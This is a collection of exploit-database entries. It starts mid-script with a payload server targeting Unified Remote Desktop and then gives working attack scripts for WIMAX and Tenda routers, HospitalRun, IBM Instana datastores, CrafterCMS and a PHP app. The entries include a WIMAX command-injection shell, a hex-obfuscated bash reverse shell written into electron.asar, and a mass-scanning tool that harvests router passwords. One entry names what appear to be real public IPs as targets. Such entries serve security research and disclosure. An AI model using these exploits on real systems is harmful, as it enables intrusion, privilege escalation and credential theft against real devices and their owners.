mode='wb') as zo: zo.write(base64.b64decode(payloadzip)) zo.close() with zipfile.ZipFile('src.zip') as inzip, zipfile.ZipFile('dst.zip', "w") as outzip: for inzipinfo in inzip.infolist(): with inzip.open(inzipinfo) as infile: if inzipinfo.filename == "remote.lua": global command content = infile.read() content = content.replace(b"rplcemelykmyx", bytes(command,"utf-8")) outzip.writestr(inzipinfo.filename, content) else: content = infile.read() outzip.writestr(inzipinfo.filename, content) inzip.close() outzip.close() if os.name == 'nt': os.system('del src.zip') else: os.system('rm src.zip') zi = open('dst.zip', 'rb') b64data = base64.b64encode(zi.read()).decode('utf-8') zi.close() if os.name == 'nt': os.system('del src.zip') else: os.system('rm dst.zip') return b64data def user_update(): time.sleep(1.5) while True: new_cmd = input("CMD> ") if new_cmd.lower() not in ["exit","quit"]: global command command = new_cmd else: os._exit(0) def http_handler(): BaseHandle = BaseHTTPRequestHandler BaseHandle.server_version = "Apache/2.4.10 (Debian)" BaseHandle.sys_version = "Unix (Posix)/6.1" class Handler(BaseHandle): def log_message(self, format, *args): pass def _set_headers(self): self.send_header('Content-Type', 'text/html') def do_GET(self): if self.path.split('/')[1] == "index.html?base_fields=1": self.send_response(200) self._set_headers() self.wfile.write(bytes(generate_payload(),"utf-8")) else: self.send_response(404) self._set_headers() self.end_headers() self.wfile.write(base64.b64decode(html_404)) http_serve = HTTPServer(('0.0.0.0', int(args['port'])), Handler) print('[+] SERVING DYNAMIC PAYLOAD PAGE ...') print("[!] Send To Victim Running Unified Remote Desktop App: http://%s:%s/index.html?base_fields=1" % (args['ip'],str(args['port']))) http_serve.serve_forever() Thread1 = threading.Thread(target=http_handler) Thread2 = threading.Thread(target=user_update) Thread1.start() Thread2.start()

# Exploit Title: WIMAX SWC-5100W Firmware V(1.11.0.1 :1.9.9.4) - Authenticated RCE # Vulnerability Name: Ballin' Mada # Date: 4/3/2023 # Exploit Author: Momen Eldawakhly (Cyber Guy) # Vendor Homepage: http://www.seowonintech.co.kr/eng/main # Version: Bootloader(1.18.19.0) , HW (0.0.7.0), FW(1.11.0.1 : 1.9.9.4) # Tested on: Unix # CVE : Under registration import requests import random,argparse import sys from colorama import Fore from bs4 import BeautifulSoup red = Fore.RED green = Fore.GREEN cyan = Fore.CYAN yellow = Fore.YELLOW reset = Fore.RESET argParser = argparse.ArgumentParser() argParser.add_argument("-t", "--target", help="Target router") argParser.add_argument("-rv", "--reverseShell", help="Obtain reverse shell", action='store_true') argParser.add_argument("-tx", "--testExploit", help="Test exploitability", action='store_true') args = argParser.parse_args() target = args.target rev = args.reverseShell testX = args.testExploit banner = """ ____ ____ ____ ____ ____ ____ ____ _________ ____ ____ ____ ____ ||B |||a |||l |||l |||i |||n |||' ||| |||M |||a |||d |||a || ||__|||__|||__|||__|||__|||__|||__|||_______|||__|||__|||__|||__|| |/__\|/__\|/__\|/__\|/__\|/__\|/__\|/_______\|/__\|/__\|/__\|/__\| RCE 0day in WIMAX SWC-5100W [ Spell the CGI as in Cyber Guy ] """ def checkEXP(): print(cyan + "[+] Checking if target is vulnerable" + reset) art = ['PWNED_1EE7', 'CGI AS IN CYBER GUY'] request = requests.get(url = f"http://{target}/cgi-bin/diagnostic.cgi?action=Apply&html_view=ping&ping_count=10&ping_ipaddr=;echo 'PUTS("+random.choice(art)+")';", proxies=None) if request.status_code == 200: print(green + "[+] Status code: 200 success" + reset) soup = BeautifulSoup(request.text, 'html.parser') if soup.get_text(" ").find("PWNED_1EE7") < 0 or soup.get_text(" ").find("CGI AS IN CYBER GUY"): print(green + "[+] Target is vulnerable" + reset) uname = requests.get(url = f"http://{target}/cgi-bin/diagnostic.cgi?action=Apply&html_view=ping&ping_count=10&ping_ipaddr=;echo+\"<a+id='pwned'>[*] Kernel: `uname+-a` -=-=- [*] Current directory: `pwd` -=-=- [*] User: `whoami`</a>\";") soup_validate = BeautifulSoup(uname.text, 'html.parser') print(soup_validate.find(id="pwned").text) else: print(red + "[+] Seems to be not vulnerable" + reset) else: print(red + "[+] Status code: " + str(request.status_code) + reset) def revShell(): cmd = input("CGI #:- ") while cmd: try: print(cmd) uname = requests.get(url = f"http://{target}/cgi-bin/diagnostic.cgi?action=Apply&html_view=ping&ping_count=10&ping_ipaddr=;echo+\"<a+id='result'>`{cmd}`</a>\";") resp = BeautifulSoup(uname.text, 'html.parser') print(resp.find(id="result").text) if cmd == "exit" or cmd == "quit": print(yellow + "[*] Terminating ..." + reset) sys.exit(0) else: return revShell() except KeyboardInterrupt: sys.exit(0) def help(): print( """ [+] Example: python3 pwnMada.py -t 192.168.1.1 -rv [*] -t, --target :: Specify target to attack. [*] -rv, --reverseShell :: Obtain reverse shell. [*] -tx, --testExploit :: Test the exploitability of the target. [*] -fz, --fuzz :: Fuzz the target with arbitrary chars. """ ) if target and rev: print(banner) revShell() elif target and testX: print(banner) checkEXP() else: print(banner) argParser.print_help()

# Exploit Title: HospitalRun 1.0.0-beta - Local Root Exploit for macOS # Written by Jean Pereira <[email protected]> # Date: 2023/03/04 # Vendor Homepage: https://hospitalrun.io # Software Link: https://github.com/HospitalRun/hospitalrun-frontend/releases/download/1.0.0-beta/HospitalRun.dmg # Version: 1.0.0-beta # Tested on: macOS Ventura 13.2.1 (22D68) # Impact: Command Execution, Privilege Escalation # Instructions: # Run local TCP listener with (e.g. nc -l 2222) # Run exploit # Wait for HospitalRun to be executed # Profit (privileged rights e.g. root are gained) # Hotfix: Remove write permissions from electron.asar to patch this vulnerability # Exploit: buffer = "\x63\x6F\x6E\x73\x74\x20\x72\x65\x6E" + "\x64\x65\x72\x50\x72\x6F\x63\x65\x73" + "\x73\x50\x72\x65\x66\x65\x72\x65\x6E" + "\x63\x65\x73\x20\x3D\x20\x70\x72\x6F" + "\x63\x65\x73\x73\x2E\x61\x74\x6F\x6D" + "\x42\x69\x6E\x64\x69\x6E\x67\x28\x27" + "\x72\x65\x6E\x64\x65\x72\x5F\x70\x72" + "\x6F\x63\x65\x73\x73\x5F\x70\x72\x65" + "\x66\x65\x72\x65\x6E\x63\x65\x73\x27" + "\x29\x2E\x66\x6F\x72\x41\x6C\x6C\x57" + "\x65\x62\x43\x6F\x6E\x74\x65\x6E\x74" + "\x73\x28\x29" payload = "\x72\x65\x71\x75\x69\x72\x65\x28\x22" + "\x63\x68\x69\x6C\x64\x5F\x70\x72\x6F" + "\x63\x65\x73\x73\x22\x29\x2E\x65\x78" + "\x65\x63\x53\x79\x6E\x63\x28\x22\x2F" + "\x62\x69\x6E\x2F\x62\x61\x73\x68\x20" + "\x2D\x63\x20\x27\x65\x78\x65\x63\x20" + "\x62\x61\x73\x68\x20\x2D\x69\x20\x3E" + "\x2F\x64\x65\x76\x2F\x74\x63\x70\x2F" + "\x30\x2E\x30\x2E\x30\x2E\x30\x2F\x32" + "\x32\x32\x32\x20\x30\x3E\x26\x31\x27" + "\x22\x29" nopsled = "\x2F\x2A\x2A\x2A\x2A" + "\x2A\x2A\x2A\x2A\x2F" File.open("/Applications/HospitalRun.app/Contents/Resources/electron.asar", "rb+") do |file| electron = file.read electron.gsub!(buffer, payload + nopsled) file.pos = 0 file.write(electron) end

## Title: Purchase Order Management-1.0 - Local File Inclusion ## Author: nu11secur1ty ## Date: 03.06.2023 ## Vendor: https://www.sourcecodester.com/user/257130/activity ## Software: https://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html ## Reference: https://brightsec.com/blog/file-inclusion-vulnerabilities/ ## Description: The Purchase Order Management-1.0 suffer from File Inclusion Vulnerabilities. The users of this system are allowed to submit input into files or upload files to the server. The malicious attacker can get absolute control of this system! STATUS: CRITICAL Vulnerability [+]Get Info: ```PHP <?php // by nu11secur1ty - 2023 phpinfo(); ?> ``` [+]Exploit: ```PHP <?php // by nu11secur1ty - 2023 // Old Name Of The file $old_name = "C:/xampp7/htdocs/purchase_order/" ; // New Name For The File $new_name = "C:/xampp7/htdocs/purchase_order_stupid/" ; // using rename() function to rename the file rename( $old_name, $new_name) ; ?> ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2023/Purchase-Order-Management-1.0) ## Proof and Exploit: [href](https://streamable.com/vkq31h) ## Time spend: 00:35:00 -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/https://cve.mitre.org/index.html and https://www.exploit-db.com/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/> -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html https://cxsecurity.com/ and https://www.exploit-db.com/ 0day Exploit DataBase https://0day.today/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/>

## Exploit Title: craftercms 4.x.x - CORS ## Author: nu11secur1ty ## Date: 03.07.2023 ## Vendor: https://docs.craftercms.org/en/4.0/index.html# ## Software: https://github.com/craftercms/craftercms/tags => 4.x.x ## Reference: https://portswigger.net/web-security/cors ## Description: The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain. The application allowed access from the requested origin pwnedhost1.com which domain is on the attacker. The application allows two-way interaction from the pwnedhost1.com origin. This effectively means that any domain can perform two-way interaction by causing the browser to submit the null origin, for example by issuing the request from a sandboxed iframe. The attacker can use some library of the victim and this can be very dangerous! STATUS: HIGH Vulnerability [+]Exploit: [-]REQUEST... ```GET GET /studio/api/1/services/api/1/server/get-available-languages.json HTTP/1.1 Host: 192.168.100.87:8080 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en-US;q=0.9,en;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36 Connection: close Cache-Control: max-age=0 Cookie: XSRF-TOKEN=5ce93c90-2b85-4f9a-9646-2a1e655b1d3f; JSESSIONID=4730F0ED2120D31A17574CE997325DA8 Referer: http://192.168.100.87:8080/studio/login x-requested-with: XMLHttpRequest Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="110", "Chromium";v="110" Sec-CH-UA-Platform: Windows Sec-CH-UA-Mobile: ?0 Origin: http://pwnedhost1.com/ ``` [-]RESPONSE: ``` HTTP/1.1 200 Vary: Origin Vary: Access-Control-Request-Method Vary: Access-Control-Request-Headers Access-Control-Allow-Origin: http://pwnedhost1.com/ Access-Control-Allow-Credentials: true Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: 0 X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Content-Type: application/json;charset=UTF-8 Content-Language: en-US Date: Tue, 07 Mar 2023 11:00:19 GMT Connection: close Content-Length: 124 [{"id":"en","label":"English"},{"id":"es","label":"Espa..ol"},{"id":"kr","label":"........."},{"id":"de","label":"Deutsch"}] ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/CrafterCMS/CrafterCMS-4.0.0) ## Proof and Exploit: [href](https://streamable.com/jd1x8j) ## Time spend: 01:00:00 -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html https://cxsecurity.com/ and https://www.exploit-db.com/ 0day Exploit DataBase https://0day.today/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/>

# Exploit Title: Docker based datastores for IBM Instana 241-2 243-0 - No Authentication # Google Dork: [if applicable] # Date: 06 March 2023 # Exploit Author: Shahid Parvez (zippon) # Vendor Homepage: https://www.instana.com/trial/ *and* https://www.ibm.com/docs/en/instana-observability # Software Link: https://www.ibm.com/docs/en/instana-observability/current?topic=premises-operations-docker-based-instana # Version: [Vulnerable version : 239-0 to 239-2 241-0 to 241-2 243-0] (REQUIRED Version : 241-3) # Tested on: [Mac os] # CVE : CVE-2023-27290 import argparse import subprocess import pexpect # Define the available options and their corresponding commands COMMANDS = { "kafka": "kafka-topics --bootstrap-server {host}:{port} --list --exclude-internal", "cassandra": "/bin/bash -c 'cqlsh {host} {port} && exit'", "clickhouse": 'curl --insecure "http://{host}:{port}/?query=SELECT%20*%20FROM%20system.tables"', "cockroach": "cockroach sql --host {host}:{port} --insecure", "zookeeper": "echo dump |ncat {host} {port}", "node-export": "curl http://{host}:{port}", "elasticsearch": "curl http://{host}:{port}/_cat/indices?v", "prometheus": "curl http://{host}:{port}/metrics", "clickhouse": 'wget -O system_tables.csv "http://{host}:{port}/?query=SELECT%20*%20FROM%20system.tables"' } # Define the parser for command-line arguments parser = argparse.ArgumentParser(description="Script to run various commands on a host.") parser.add_argument("host", help="The host IP address") parser.add_argument("option", choices=COMMANDS.keys(), help="Select an option") parser.add_argument("--port", type=int, default=None, help="The port number (default: use default port for the selected option)") parser.add_argument("--output", help="Output the result to a file") parser.add_argument("--verbose", action="store_true", help="Print the command line that was executed") # Parse the command-line arguments args = parser.parse_args() # Determine the port number to use if args.port is None: if args.option == "cassandra": port = "9042" elif args.option == "clickhouse": port = "8123" elif args.option == "cockroach": port = "26257" elif args.option == "elasticsearch": port = "9200" elif args.option == "kafka": port = "9092" elif args.option == "node-export": port = "8181" elif args.option == "prometheus": port = "9090" elif args.option == "zookeeper": port = "2181" else: port = str(args.port) # Build the command to execute command = COMMANDS[args.option].format(host=args.host, port=port) # Print the command line if verbose option is provided if args.verbose: print(f"Executing command: {command}") # If cassandra or cockroach option is selected, use pexpect to communicate inside the interactive shell if args.option == "cassandra": child = pexpect.spawn(command) child.expect("Connected to.*", timeout=10) child.interact() output = child.before elif args.option == "cockroach": child = pexpect.spawn(command) child.expect("root@.*:", timeout=10) child.interact() output = child.before # If any other option is selected, execute the command and capture the output else: output = subprocess.check_output(command, shell=True) # If an output file is provided, write the output to the file if args.output: with open(args.output, "wb") as f: f.write(output) # Print the output to the console print(output.decode())

# Exploit Title: MAC 1200R - Directory Traversal # Google Dork: "MAC1200R" && port="8888" # Date: 2023/03/09 # Exploit Author: Chunlei Shang, Jiangsu Public Information Co., Ltd. # Vendor Homepage: https://www.mercurycom.com.cn/ # Software Link: https://www.mercurycom.com.cn/product-1-1.html # Version: all versions. (REQUIRED) # Tested on: all versions. # CVE : CVE-2021-27825 1. Attackers can easily find the targets through various search engines with keywords "MAC1200R" && port="8888". 2. Open the affected website like "http://IP:8888/web-static/". 3. For example: 1）http://60.251.151.2:8888/web-static/ 2）http://222.215.15.70:8888/web-static/

#!/usr/bin/python3 # Exploit Title: Tenda N300 F3 12.01.01.48 - Malformed HTTP Request Header Processing # Shodan Dork: http.favicon.hash:-2145085239 http.title:"Tenda | LOGIN" # Date: 09/03/2023 # Exploit Author: @h454nsec # Github: https://github.com/H454NSec/CVE-2020-35391 # Vendor Homepage: https://www.tendacn.com/default.html # Product Link: https://www.tendacn.com/product/f3.html # Version: All # Tested on: F3v3.0 Firmware (confirmed) # CVE : CVE-2020-35391 import re import os import sys import argparse import base64 import requests import subprocess try: import mmh3 import codecs except ImportError: print("[!] Install mmh3: pip3 install mmh3") sys.exit() Color_Off="\033[0m" Black="\033[0;30m" # Black Red="\033[0;31m" # Red Green="\033[0;32m" # Green Yellow="\033[0;33m" # Yellow Blue="\033[0;34m" # Blue Purple="\033[0;35m" # Purple Cyan="\033[0;36m" # Cyan White="\033[0;37m" # White def ip_checker(ip): if "/" in ip: splited = ip.split("/") if "http://" in ip or "https://" in ip: return f"{splited[0]}://{splited[2]}" else: return f"http://{splited[0]}" else: return f"http://{ip}" def is_tenda(ip): try: response = requests.get(f'{ip}/favicon.ico') favicon = codecs.encode(response.content, "base64") favicon_hash = mmh3.hash(favicon) if favicon_hash == -2145085239: return True return False except Exception as error: return False def password_decoder(data): try: for nosense_data in data.split("\n"): if ("http_passwd=" in nosense_data): encoded_password = nosense_data.split("=")[-1] break password_bytes = base64.b64decode(encoded_password) password = password_bytes.decode("utf-8") if (len(password) != 0): return password return False except Exception as error: return False def main(db): for ip in db: ip_address = ip_checker(ip) tenda = is_tenda(ip_address) header = print(f"{Green}[+]{Yellow} {ip_address}{Color_Off}", end="") if tenda else print(f"{Red}[-]{Yellow} {ip_address}{Color_Off}", end="") try: output = subprocess.check_output(f"curl {ip_address}/cgi-bin/DownloadCfg/RouterCfm.cfg -A '' -H 'Accept:' -H 'Host:' -s", shell=True) data = output.decode('utf-8') password = password_decoder(data) if password: if not os.path.isdir("config_dump"): os.mkdir("config_dump") with open(f"config_dump/{ip_address.split('/')[-1]}.cfg", "w") as o: o.write(data) with open(f"credential.txt", "a") as o: o.write(f"{ip_address}|{password}\n") print(f"{Purple}:{Cyan}{password}{Color_Off}") else: print() except Exception as error: print() if __name__ == '__main__': parser = argparse.ArgumentParser() parser.add_argument('-i', '--ip', default='192.168.0.1', help='IP address of the target router (Default: http://192.168.0.1)') parser.add_argument('-l', '--list_of_ip', help='List of IP address') args = parser.parse_args() db = [] ip_list = args.list_of_ip if ip_list: with open(ip_list, "r") as fr: for data in fr.readlines(): db.append(data.strip()) else: db.append(args.ip) main(db)